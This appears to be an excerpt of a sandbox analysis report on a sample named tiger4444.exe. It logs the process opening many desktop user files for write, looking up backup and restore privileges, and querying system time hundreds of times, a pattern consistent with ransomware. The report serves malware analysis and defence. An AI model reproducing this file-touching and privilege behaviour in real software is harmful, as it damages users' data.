Map C:\Users\FD1HVy\Desktop\5tCVQ4PvbMxeLAZpu1.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\7C4Q.mp4 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\85suf.pdf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\9Nd9jssXw99ThRBTNM7P.png process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\aGhyAFRoo.odp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\aY_fyEf.bmp process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\Dbdfuzst6PZ_.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\dfisfgfVOG.pptx process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\DzblCW7scjQqRQVoIM.mkv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\h bd3clz1Q5tEHTT.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\h t9MdzqmL.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\hzeE96S9vKSRPUEY6BcL.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\IeLgYQ3Ib.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\LbV09sOi9q6l_9e3.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\n9ZFDGmU0-yzqmqP0W.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\p9t T04.m4a process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\pLl2qR-HR2p6.wav process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\rxUkDp.pdf process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\S7sxtg.ods process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\sKoLK4y.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\tLMtnmm.jpg process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\TMtiGZYo.mp4 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\TTdnqfy.mp3 process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\uKeH6EOh0T.avi process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\ut _Q2wK.csv process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
Map C:\Users\FD1HVy\Desktop\VrmBeAnjedws.gif process_name = c:\users\fd1hvy\desktop\tiger4444.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ True 1
Fn
For performance reasons, the remaining 298 entries are omitted.
The remaining entries can be found in glog.xml.
User (3)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeBackupPrivilege, luid = 17 True 1
Fn
Lookup Privilege privilege = SeRestorePrivilege, luid = 18 True 1
Fn
Lookup Privilege privilege = SeManageVolumePrivilege, luid = 28 True 1
Fn
System (881)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = NQDPDE True 1
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) True 7
Fn
Sleep duration = -1 (infinite) False 7
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) False 1
Fn
Get Time type = System Time, time = 2019-05-18 06:39:38 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-05-18 06:39:39 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 12940877670 True 1
Fn
Get Time type = Performance Ctr, time = 12942349217 True 1
Fn
Get Time type = Performance Ctr, time = 12958137830 True 1
Fn
Get Time type = Performance Ctr, time = 12959041875 True 1
Fn
Get Time type = Performance Ctr, time = 12979030751 True 1
Fn
Get Time type = Performance Ctr, time = 12989013154 True 1
Fn
Get Time type = Performance Ctr, time = 13001995680 True 1
Fn
Get Time type = Performance Ctr, time = 13005909965 True 1
Fn
Get Time type = Performance Ctr, time = 13052588038 True 1
Fn
Get Time type = Performance Ctr, time = 13053643988 True 1
Fn
Get Time type = Performance Ctr, time = 13054242795 True 1
Fn
Get Time type = Performance Ctr, time = 13054410420 True 1
Fn
Get Time type = Performance Ctr, time = 13064737494 True 1
Fn
Get Time type = Performance Ctr, time = 13070776899 True 1
Fn
Get Time type = Performance Ctr, time = 13091950244 True 1
Fn
Get Time type = Performance Ctr, time = 13092405097 True 1
Fn
Get Time type = Performance Ctr, time = 13092716253 True 1
Fn
Get Time type = Performance Ctr, time = 13093845082 True 1
Fn
Get Time type = Performance Ctr, time = 13125440816 True 1
Fn
Get Time type = Performance Ctr, time = 13127352476 True 1
Fn
Get Time type = Performance Ctr, time = 13143060386 True 1
Fn
Get Time type = Performance Ctr, time = 13143548599 True 1
Fn
Get Time type = Performance Ctr, time = 13147801012 True 1
Fn
Get Time type = Performance Ctr, time = 13173437559 True 1
Fn
Get Time type = Performance Ctr, time = 13173790604 True 1
Fn
Get Time type = Performance Ctr, time = 13174348815 True 1
Fn
Get Time type = Performance Ctr, time = 13176620679 True 1
Fn
Get Time type = Performance Ctr, time = 13177504750 True 1
Fn
Get Time type = Performance Ctr, time = 13179499224 True 1
Fn
Get Time type = Performance Ctr, time = 13185299445 True 1
Fn
Get Time type = Performance Ctr, time = 13236057348 True 1
Fn
Get Time type = Performance Ctr, time = 13257884739 True 1
Fn
Get Time type = Performance Ctr, time = 13262712670 True 1
Fn
Get Time type = Performance Ctr, time = 13264191699 True 1
Fn
Get Time type = Performance Ctr, time = 13267385081 True 1
Fn
Get Time type = Performance Ctr, time = 13271253356 True 1
Fn
Get Time type = Performance Ctr, time = 13272327910 True 1
Fn
Get Time type = Performance Ctr, time = 13284395100 True 1
Fn
Get Time type = Performance Ctr, time = 13294945608 True 1
Fn
Get Time type = Performance Ctr, time = 13296345530 True 1
Fn
Get Time type = Performance Ctr, time = 13296833142 True 1
Fn
Get Time type = Performance Ctr, time = 13297889218 True 1
Fn
Get Time type = Performance Ctr, time = 13298256489 True 1
Fn
Get Time type = Performance Ctr, time = 13298601659 True 1
Fn
Get Time type = Performance Ctr, time = 13298953723 True 1
Fn
Get Time type = Performance Ctr, time = 13299265735 True 1
Fn
Get Time type = Performance Ctr, time = 13299589978 True 1
Fn
Get Time type = Performance Ctr, time = 13309913571 True 1
Fn
Get Time type = Performance Ctr, time = 13310486859 True 1
Fn
Get Time type = Performance Ctr, time = 13311856534 True 1
Fn
Get Time type = Performance Ctr, time = 13312260199 True 1
Fn
Get Time type = Performance Ctr, time = 13312686720 True 1
Fn
Get Time type = Performance Ctr, time = 13313134545 True 1
Fn
Get Time type = Performance Ctr, time = 13314546750 True 1
Fn
Get Time type = Performance Ctr, time = 13314869878 True 1
Fn
Get Time type = Performance Ctr, time = 13316695920 True 1
Fn
Get Time type = Performance Ctr, time = 13318195384 True 1
Fn
Get Time type = Performance Ctr, time = 13318543785 True 1
Fn
Get Time type = Performance Ctr, time = 13318879630 True 1
Fn
Get Time type = Performance Ctr, time = 13319158073 True 1
Fn
Get Time type = Performance Ctr, time = 13319469094 True 1
Fn
Get Time type = Performance Ctr, time = 13319725348 True 1
Fn
Get Time type = Performance Ctr, time = 13320059883 True 1
Fn
Get Time type = Performance Ctr, time = 13321712645 True 1
Fn
Get Time type = Performance Ctr, time = 13322195894 True 1
Fn
Get Time type = Performance Ctr, time = 13322550444 True 1
Fn
Get Time type = Performance Ctr, time = 13322926194 True 1
Fn
Get Time type = Performance Ctr, time = 13325198388 True 1
Fn
Get Time type = Performance Ctr, time = 13325610434 True 1
Fn
Get Time type = Performance Ctr, time = 13327065518 True 1
Fn
Get Time type = Performance Ctr, time = 13327646515 True 1
Fn
Get Time type = Performance Ctr, time = 13338565469 True 1
Fn
Get Time type = Performance Ctr, time = 13340571492 True 1
Fn
Get Time type = Performance Ctr, time = 13340891434 True 1
Fn
Get Time type = Performance Ctr, time = 13341225136 True 1
Fn
Get Time type = Performance Ctr, time = 13341456957 True 1
Fn
Get Time type = Performance Ctr, time = 13341835618 True 1
Fn
Get Time type = Performance Ctr, time = 13342059081 True 1
Fn
Get Time type = Performance Ctr, time = 13345623363 True 1
Fn
Get Time type = Performance Ctr, time = 13351101814 True 1
Fn
Get Time type = Performance Ctr, time = 13374670285 True 1
Fn
Get Time type = Performance Ctr, time = 13432555410 True 1
Fn
Get Time type = Performance Ctr, time = 13444237964 True 1
Fn
Get Time type = Performance Ctr, time = 13444660968 True 1
Fn
Get Time type = Performance Ctr, time = 13445065365 True 1
Fn
Get Time type = Performance Ctr, time = 13450958269 True 1
Fn
Get Time type = Performance Ctr, time = 13459634459 True 1
Fn
Get Time type = Performance Ctr, time = 13460907619 True 1
Fn
Get Time type = Performance Ctr, time = 13461477757 True 1
Fn
Get Time type = Performance Ctr, time = 13463724610 True 1
Fn
Get Time type = Performance Ctr, time = 13464795037 True 1
Fn
Get Time type = Performance Ctr, time = 13470335988 True 1
Fn
Get Time type = Performance Ctr, time = 13471009716 True 1
Fn
Get Time type = Performance Ctr, time = 13472440364 True 1
Fn
Get Time type = Performance Ctr, time = 13472910127 True 1
Fn
Get Time type = Performance Ctr, time = 13474356697 True 1
Fn
Get Time type = Performance Ctr, time = 13474826486 True 1
Fn
Get Time type = Performance Ctr, time = 13477190433 True 1
Fn
Get Time type = Performance Ctr, time = 13478054842 True 1
Fn
Get Time type = Performance Ctr, time = 13478495220 True 1
Fn
Get Time type = Performance Ctr, time = 13478999796 True 1
Fn
Get Time type = Performance Ctr, time = 13479453157 True 1
Fn
Get Time type = Performance Ctr, time = 13479905301 True 1
Fn
Get Time type = Performance Ctr, time = 13484209498 True 1
Fn
Get Time type = Performance Ctr, time = 13484752026 True 1
Fn
Get Time type = Performance Ctr, time = 13487322115 True 1
Fn
Get Time type = Performance Ctr, time = 13487971847 True 1
Fn
Get Time type = Performance Ctr, time = 13489365776 True 1
Fn
Get Time type = Performance Ctr, time = 13489926165 True 1
Fn
Get Time type = Performance Ctr, time = 13490545711 True 1
Fn
Get Time type = Performance Ctr, time = 13491329594 True 1
Fn
Get Time type = Performance Ctr, time = 13495506326 True 1
Fn
Get Time type = Performance Ctr, time = 13496043309 True 1
Fn
Get Time type = Performance Ctr, time = 13496569052 True 1
Fn
Get Time type = Performance Ctr, time = 13497293745 True 1
Fn
Get Time type = Performance Ctr, time = 13532332256 True 1
Fn
Get Time type = Performance Ctr, time = 13539941985 True 1
Fn
Get Time type = Performance Ctr, time = 13546704892 True 1
Fn
Get Time type = Performance Ctr, time = 13547220811 True 1
Fn
Get Time type = Performance Ctr, time = 13547761269 True 1
Fn
Get Time type = Performance Ctr, time = 13548282535 True 1
Fn
Get Time type = Performance Ctr, time = 13549764672 True 1
Fn
Get Time type = Performance Ctr, time = 13550320485 True 1
Fn
Get Time type = Performance Ctr, time = 13551495975 True 1
Fn
Get Time type = Performance Ctr, time = 13552484107 True 1
Fn
Get Time type = Performance Ctr, time = 13554973957 True 1
Fn
Get Time type = Performance Ctr, time = 13556960624 True 1
Fn
Get Time type = Performance Ctr, time = 13557565400 True 1
Fn
Get Time type = Performance Ctr, time = 13558451732 True 1
Fn
Get Time type = Performance Ctr, time = 13559087327 True 1
Fn
Get Time type = Performance Ctr, time = 13559633560 True 1
Fn
Get Time type = Performance Ctr, time = 13560127968 True 1
Fn
Get Time type = Performance Ctr, time = 13560706119 True 1
Fn
Get Time type = Performance Ctr, time = 13561132319 True 1
Fn
Get Time type = Performance Ctr, time = 13561612561 True 1
Fn
Get Time type = Performance Ctr, time = 13562159798 True 1
Fn
Get Time type = Performance Ctr, time = 13562680742 True 1
Fn
Get Time type = Performance Ctr, time = 13563221968 True 1
Fn
Get Time type = Performance Ctr, time = 13563700763 True 1
Fn
Get Time type = Performance Ctr, time = 13564237043 True 1
Fn
Get Time type = Performance Ctr, time = 13564769957 True 1
Fn
Get Time type = Performance Ctr, time = 13565290259 True 1
Fn
Get Time type = Performance Ctr, time = 13565858495 True 1
Fn
Get Time type = Performance Ctr, time = 13566819643 True 1
Fn
Get Time type = Performance Ctr, time = 13567885228 True 1
Fn
Get Time type = Performance Ctr, time = 13568580912 True 1
Fn
Get Time type = Performance Ctr, time = 13569131654 True 1
Fn
Get Time type = Performance Ctr, time = 13569625259 True 1
Fn
Get Time type = Performance Ctr, time = 13570127119 True 1
Fn
Get Time type = Performance Ctr, time = 13570662868 True 1
Fn
Get Time type = Performance Ctr, time = 13571389229 True 1
Fn
Get Time type = Performance Ctr, time = 13571877335 True 1
Fn
Get Time type = Performance Ctr, time = 13572415940 True 1
Fn
Get Time type = Performance Ctr, time = 13573407609 True 1
Fn
Get Time type = Performance Ctr, time = 13574314580 True 1
Fn
Get Time type = Performance Ctr, time = 13574863825 True 1
Fn
Get Time type = Performance Ctr, time = 13575405373 True 1
Fn
Get Time type = Performance Ctr, time = 13576315975 True 1
Fn
Get Time type = Performance Ctr, time = 13577325019 True 1
Fn
Get Time type = Performance Ctr, time = 13578931121 True 1
Fn
Get Time type = Performance Ctr, time = 13579545955 True 1
Fn
Get Time type = Performance Ctr, time = 13580878823 True 1
Fn
Get Time type = Performance Ctr, time = 13581595115 True 1
Fn
Get Time type = Performance Ctr, time = 13589069625 True 1
Fn
Get Time type = Performance Ctr, time = 13602095995 True 1
Fn
Get Time type = Performance Ctr, time = 13602716711 True 1
Fn
Get Time type = Performance Ctr, time = 13603497962 True 1
Fn
Get Time type = Performance Ctr, time = 13605139324 True 1
Fn
Get Time type = Performance Ctr, time = 13605625427 True 1
Fn
Get Time type = Performance Ctr, time = 13605894030 True 1
Fn
Get Time type = Performance Ctr, time = 13606236766 True 1
Fn
Get Time type = Performance Ctr, time = 13611057782 True 1
Fn
Get Time type = Performance Ctr, time = 13611402145 True 1
Fn
Get Time type = Performance Ctr, time = 13612875286 True 1
Fn
Get Time type = Performance Ctr, time = 13634239101 True 1
Fn
Get Time type = Performance Ctr, time = 13636130303 True 1
Fn
Get Time type = Performance Ctr, time = 13655263419 True 1
Fn
Get Time type = Performance Ctr, time = 13655416438 True 1
Fn
Get Time type = Performance Ctr, time = 13655813756 True 1
Fn
Get Time type = Performance Ctr, time = 13656023841 True 1
Fn
Get Time type = Performance Ctr, time = 13657005030 True 1
Fn
Get Time type = Performance Ctr, time = 13657298727 True 1
Fn
Get Time type = Performance Ctr, time = 13657939786 True 1
Fn
Get Time type = Performance Ctr, time = 13658087794 True 1
Fn
Get Time type = Performance Ctr, time = 13658446743 True 1
Fn
Get Time type = Performance Ctr, time = 13658574715 True 1
Fn
Get Time type = Performance Ctr, time = 13659257526 True 1
Fn
Get Time type = Performance Ctr, time = 13659520820 True 1
Fn
Get Time type = Performance Ctr, time = 13661013074 True 1
Fn
Get Time type = Performance Ctr, time = 13661228338 True 1
Fn
Get Time type = Performance Ctr, time = 13663056765 True 1
Fn
Get Time type = Performance Ctr, time = 13663258264 True 1
Fn
Get Time type = Performance Ctr, time = 13663715145 True 1
Fn
Get Time type = Performance Ctr, time = 13663879576 True 1
Fn
Get Time type = Performance Ctr, time = 13664272920 True 1
Fn
Get Time type = Performance Ctr, time = 13664514979 True 1
Fn
Get Time type = Performance Ctr, time = 13665003908 True 1
Fn
Get Time type = Performance Ctr, time = 13665465131 True 1
Fn
Get Time type = Performance Ctr, time = 13665969747 True 1
Fn
Get Time type = Performance Ctr, time = 13666127228 True 1
Fn
Get Time type = Performance Ctr, time = 13666471803 True 1
Fn
Get Time type = Performance Ctr, time = 13666739357 True 1
Fn
Get Time type = Performance Ctr, time = 13667261718 True 1
Fn
Get Time type = Performance Ctr, time = 13667407281 True 1
Fn
Get Time type = Performance Ctr, time = 13667785509 True 1
Fn
Get Time type = Performance Ctr, time = 13668046596 True 1
Fn
Get Time type = Performance Ctr, time = 13669845082 True 1
Fn
Get Time type = Performance Ctr, time = 13670070851 True 1
Fn
Get Time type = Performance Ctr, time = 13670533003 True 1
Fn
Get Time type = Performance Ctr, time = 13670710609 True 1
Fn
Get Time type = Performance Ctr, time = 13671147667 True 1
Fn
Get Time type = Performance Ctr, time = 13671299389 True 1
Fn
Get Time type = Performance Ctr, time = 13671747509 True 1
Fn
Get Time type = Performance Ctr, time = 13671959556 True 1
Fn
Get Time type = Performance Ctr, time = 13674427840 True 1
Fn
Get Time type = Performance Ctr, time = 13674688576 True 1
Fn
Get Time type = Performance Ctr, time = 13675175648 True 1
Fn
Get Time type = Performance Ctr, time = 13675405011 True 1
Fn
Get Time type = Performance Ctr, time = 13675856771 True 1
Fn
Get Time type = Performance Ctr, time = 13676103402 True 1
Fn
Get Time type = Performance Ctr, time = 13676596010 True 1
Fn
Get Time type = Performance Ctr, time = 13676825506 True 1
Fn
Get Time type = Performance Ctr, time = 13677366554 True 1
Fn
Get Time type = Performance Ctr, time = 13677689951 True 1
Fn
Get Time type = Performance Ctr, time = 13679402882 True 1
Fn
Get Time type = Performance Ctr, time = 13679730374 True 1
Fn
Get Time type = Performance Ctr, time = 13680646667 True 1
Fn
Get Time type = Performance Ctr, time = 13680972442 True 1
Fn
Get Time type = Performance Ctr, time = 13681622542 True 1
Fn
Get Time type = Performance Ctr, time = 13681815219 True 1
Fn
Get Time type = Performance Ctr, time = 13683024307 True 1
Fn
Get Time type = Performance Ctr, time = 13683174465 True 1
Fn
Get Time type = Performance Ctr, time = 13688348940 True 1
Fn
Get Time type = Performance Ctr, time = 13690221098 True 1
Fn
Get Time type = Performance Ctr, time = 13694022607 True 1
Fn
Get Time type = Performance Ctr, time = 13694171584 True 1
Fn
Get Time type = Performance Ctr, time = 13694532125 True 1
Fn
Get Time type = Performance Ctr, time = 13694743364 True 1
Fn
Get Time type = Performance Ctr, time = 13695238862 True 1
Fn
Get Time type = Performance Ctr, time = 13695427966 True 1
Fn
Get Time type = Performance Ctr, time = 13695978888 True 1
Fn
Get Time type = Performance Ctr, time = 13696263757 True 1
Fn
Get Time type = Performance Ctr, time = 13696868363 True 1
Fn
Get Time type = Performance Ctr, time = 13696994541 True 1
Fn
Get Time type = Performance Ctr, time = 13697357337 True 1
Fn
Get Time type = Performance Ctr, time = 13697573302 True 1
Fn
Get Time type = Performance Ctr, time = 13698005876 True 1
Fn
Get Time type = Performance Ctr, time = 13698194075 True 1
Fn
Get Time type = Performance Ctr, time = 13698735045 True 1
Fn
Get Time type = Performance Ctr, time = 13698983499 True 1
Fn
Get Time type = Performance Ctr, time = 13699373621 True 1
Fn
Get Time type = Performance Ctr, time = 13699524423 True 1
Fn
Get Time type = Performance Ctr, time = 13700190156 True 1
Fn
Get Time type = Performance Ctr, time = 13700343538 True 1
Fn
Get Time type = Performance Ctr, time = 13700851519 True 1
Fn
Get Time type = Performance Ctr, time = 13701009626 True 1
Fn
Get Time type = Performance Ctr, time = 13701333337 True 1
Fn
Get Time type = Performance Ctr, time = 13701591136 True 1
Fn
Get Time type = Performance Ctr, time = 13702059571 True 1
Fn
Get Time type = Performance Ctr, time = 13702277692 True 1
Fn
Get Time type = Performance Ctr, time = 13702850708 True 1
Fn
Get Time type = Performance Ctr, time = 13702995213 True 1
Fn
Get Time type = Performance Ctr, time = 13703382760 True 1
Fn
Get Time type = Performance Ctr, time = 13703655500 True 1
Fn
Get Time type = Performance Ctr, time = 13704286871 True 1
Fn
Get Time type = Performance Ctr, time = 13704620184 True 1
Fn
Get Time type = Performance Ctr, time = 13705197342 True 1
Fn
Get Time type = Performance Ctr, time = 13705506325 True 1
Fn
Get Time type = Performance Ctr, time = 13706328877 True 1
Fn
Get Time type = Performance Ctr, time = 13706555587 True 1
Fn
Get Time type = Performance Ctr, time = 13707003344 True 1
Fn
Get Time type = Performance Ctr, time = 13707240500 True 1
Fn
Get Time type = Performance Ctr, time = 13707703753 True 1
Fn
Get Time type = Performance Ctr, time = 13707842318 True 1
Fn
Get Time type = Performance Ctr, time = 13708287895 True 1
Fn
Get Time type = Performance Ctr, time = 13708497067 True 1
Fn
Get Time type = Performance Ctr, time = 13708908956 True 1
Fn
Get Time type = Performance Ctr, time = 13709120264 True 1
Fn
Get Time type = Performance Ctr, time = 13709605925 True 1
Fn
Get Time type = Performance Ctr, time = 13709816287 True 1
Fn
Get Time type = Performance Ctr, time = 13710194807 True 1
Fn
Get Time type = Performance Ctr, time = 13710405079 True 1
Fn
Get Time type = Performance Ctr, time = 13710844094 True 1
Fn
Get Time type = Performance Ctr, time = 13711034312 True 1
Fn
Get Time type = Performance Ctr, time = 13711516498 True 1
Fn
Get Time type = Performance Ctr, time = 13711720576 True 1
Fn
Get Time type = Performance Ctr, time = 13712170865 True 1
Fn
Get Time type = Performance Ctr, time = 13712284188 True 1
Fn
Get Time type = Performance Ctr, time = 13712755433 True 1
Fn
Get Time type = Performance Ctr, time = 13712966781 True 1
Fn
Get Time type = Performance Ctr, time = 13713363017 True 1
Fn
Get Time type = Performance Ctr, time = 13713621242 True 1
Fn
Get Time type = Performance Ctr, time = 13714141174 True 1
Fn
Get Time type = Performance Ctr, time = 13714306799 True 1
Fn
Get Time type = Performance Ctr, time = 13714723481 True 1
Fn
Get Time type = Performance Ctr, time = 13714854938 True 1
Fn
Get Time type = Performance Ctr, time = 13715247202 True 1
Fn
Get Time type = Performance Ctr, time = 13715460157 True 1
Fn
Get Time type = Performance Ctr, time = 13715963238 True 1
Fn
Get Time type = Performance Ctr, time = 13716187647 True 1
Fn
Get Time type = Performance Ctr, time = 13717053553 True 1
Fn
Get Time type = Performance Ctr, time = 13717229761 True 1
Fn
Get Time type = Performance Ctr, time = 13717631528 True 1
Fn
Get Time type = Performance Ctr, time = 13717798900 True 1
Fn
Get Time type = Performance Ctr, time = 13718193612 True 1
Fn
Get Time type = Performance Ctr, time = 13718398379 True 1
Fn
Get Time type = Performance Ctr, time = 13718819163 True 1
Fn
Get Time type = Performance Ctr, time = 13718934982 True 1
Fn
Get Time type = Performance Ctr, time = 13719229602 True 1
Fn
Get Time type = Performance Ctr, time = 13719336875 True 1
Fn
Get Time type = Performance Ctr, time = 13726577538 True 1
Fn
Get Time type = Performance Ctr, time = 13726753607 True 1
Fn
Get Time type = Performance Ctr, time = 13727240376 True 1
Fn
Get Time type = Performance Ctr, time = 13727412409 True 1
Fn
Get Time type = Performance Ctr, time = 13727856804 True 1
Fn
Get Time type = Performance Ctr, time = 13728086896 True 1
Fn
Get Time type = Performance Ctr, time = 13728713304 True 1
Fn
Get Time type = Performance Ctr, time = 13728963133 True 1
Fn
Get Time type = Performance Ctr, time = 13729480845 True 1
Fn
Get Time type = Performance Ctr, time = 13729618792 True 1
Fn
Get Time type = Performance Ctr, time = 13731228443 True 1
Fn
Get Time type = Performance Ctr, time = 13731472032 True 1
Fn
Get Time type = Performance Ctr, time = 13731884753 True 1
Fn
Get Time type = Performance Ctr, time = 13732003974 True 1
Fn
Get Time type = Performance Ctr, time = 13733185268 True 1
Fn
Get Time type = Performance Ctr, time = 13733290312 True 1
Fn
Get Time type = Performance Ctr, time = 13733708793 True 1
Fn
Get Time type = Performance Ctr, time = 13733829381 True 1
Fn
Get Time type = Performance Ctr, time = 13734197624 True 1
Fn
Get Time type = Performance Ctr, time = 13734372462 True 1
Fn
Get Time type = Performance Ctr, time = 13734793258 True 1
Fn
Get Time type = Performance Ctr, time = 13735795071 True 1
Fn
Get Time type = Performance Ctr, time = 13737326121 True 1
Fn
Get Time type = Performance Ctr, time = 13737528062 True 1
Fn
Get Time type = Performance Ctr, time = 13737971234 True 1
Fn
Get Time type = Performance Ctr, time = 13738195726 True 1
Fn
Get Time type = Performance Ctr, time = 13738690032 True 1
Fn
Get Time type = Performance Ctr, time = 13738847345 True 1
Fn
Get Time type = Performance Ctr, time = 13740371136 True 1
Fn
Get Time type = Performance Ctr, time = 13740732544 True 1
Fn
Get Time type = Performance Ctr, time = 13741419249 True 1
Fn
Get Time type = Performance Ctr, time = 13741608271 True 1
Fn
Get Time type = Performance Ctr, time = 13742031587 True 1
Fn
Get Time type = Performance Ctr, time = 13742258717 True 1
Fn
Get Time type = Performance Ctr, time = 13742753584 True 1
Fn
Get Time type = Performance Ctr, time = 13742999232 True 1
Fn
Get Time type = Performance Ctr, time = 13743677215 True 1
Fn
Get Time type = Performance Ctr, time = 13743908235 True 1
Fn
Get Time type = Performance Ctr, time = 13744360338 True 1
Fn
Get Time type = Performance Ctr, time = 13745051655 True 1
Fn
Get Time type = Performance Ctr, time = 13745668167 True 1
Fn
Get Time type = Performance Ctr, time = 13745826588 True 1
Fn
Get Time type = Performance Ctr, time = 13746194257 True 1
Fn
Get Time type = Performance Ctr, time = 13746417608 True 1
Fn
Get Time type = Performance Ctr, time = 13747728062 True 1
Fn
Get Time type = Performance Ctr, time = 13747910073 True 1
Fn
Get Time type = Performance Ctr, time = 13748319140 True 1
Fn
Get Time type = Performance Ctr, time = 13748446187 True 1
Fn
Get Time type = Performance Ctr, time = 13748784945 True 1
Fn
Get Time type = Performance Ctr, time = 13748944585 True 1
Fn
Get Time type = Performance Ctr, time = 13750596350 True 1
Fn
Get Time type = Performance Ctr, time = 13750827280 True 1
Fn
Get Time type = Performance Ctr, time = 13751346211 True 1
Fn
Get Time type = Performance Ctr, time = 13751596765 True 1
Fn
Get Time type = Performance Ctr, time = 13752096223 True 1
Fn
Get Time type = Performance Ctr, time = 13752354468 True 1
Fn
Get Time type = Performance Ctr, time = 13753705003 True 1
Fn
Get Time type = Performance Ctr, time = 13753907664 True 1
Fn
Get Time type = Performance Ctr, time = 13754641976 True 1
Fn
Get Time type = Performance Ctr, time = 13754907574 True 1
Fn
Get Time type = Performance Ctr, time = 13755617066 True 1
Fn
Get Time type = Performance Ctr, time = 13755884296 True 1
Fn
Get Time type = Performance Ctr, time = 13756387655 True 1
Fn
Get Time type = Performance Ctr, time = 13756616140 True 1
Fn
Get Time type = Performance Ctr, time = 13758399558 True 1
Fn
Get Time type = Performance Ctr, time = 13758538254 True 1
Fn
Get Time type = Performance Ctr, time = 13758917167 True 1
Fn
Get Time type = Performance Ctr, time = 13759102508 True 1
Fn
Get Time type = Performance Ctr, time = 13759517760 True 1
Fn
Get Time type = Performance Ctr, time = 13759680157 True 1
Fn
Get Time type = Performance Ctr, time = 13761310612 True 1
Fn
Get Time type = Performance Ctr, time = 13761424081 True 1
Fn
Get Time type = Performance Ctr, time = 13761737820 True 1
Fn
Get Time type = Performance Ctr, time = 13761967167 True 1
Fn
Get Time type = Performance Ctr, time = 13762551236 True 1
Fn
Get Time type = Performance Ctr, time = 13762768616 True 1
Fn
Get Time type = Performance Ctr, time = 13765656575 True 1
Fn
Get Time type = Performance Ctr, time = 13766124097 True 1
Fn
Get Time type = Performance Ctr, time = 13770883873 True 1
Fn
Get Time type = Performance Ctr, time = 13771085154 True 1
Fn
Get Time type = Performance Ctr, time = 13771556546 True 1
Fn
Get Time type = Performance Ctr, time = 13771775646 True 1
Fn
Get Time type = Performance Ctr, time = 13772413301 True 1
Fn
Get Time type = Performance Ctr, time = 13785978904 True 1
Fn
Get Time type = Performance Ctr, time = 13794151794 True 1
Fn
Get Time type = Performance Ctr, time = 13794357877 True 1
Fn
Get Time type = Performance Ctr, time = 13795003038 True 1
Fn
Get Time type = Performance Ctr, time = 13795181334 True 1
Fn
Get Time type = Performance Ctr, time = 13795663991 True 1
Fn
Get Time type = Performance Ctr, time = 13795899658 True 1
Fn
Get Time type = Performance Ctr, time = 13796226094 True 1
Fn
